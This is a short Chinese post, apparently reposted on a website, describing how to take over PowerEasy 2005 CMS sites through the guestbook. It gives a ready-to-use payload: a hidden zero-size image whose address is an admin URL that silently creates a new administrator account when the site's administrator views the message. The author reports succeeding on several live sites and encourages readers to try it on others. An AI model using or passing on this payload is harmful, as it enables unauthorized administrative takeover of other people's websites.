動易2005里面，留言的時候存在一個XSS。 攻擊方法如下 ： 首先在網(wǎng)站注冊一個普通會員，然后去GUESTBOOK留言，在插入圖片的時候地址寫上(建議在原代碼里面把圖片的高度與寬度都設(shè)置成0，這樣在圖片前面加上這個連接，基本上就看不見圖片了，圖片的連接卻被管理員解吸執(zhí)行了)： http://localhost/PowerEasy/admin/admin_admin.asp?AdminName=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&Action=SaveAdd 上面是本地測試地址。 只要你的留言寫的足夠誘惑，只要管理員一看，就OK了，他回復(fù)了你，你就是后臺管理員了··· 我自己測試了幾個站，結(jié)果都成功了，呵呵。大家也可以去測試一下，通殺了 SQL 與AC版···

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。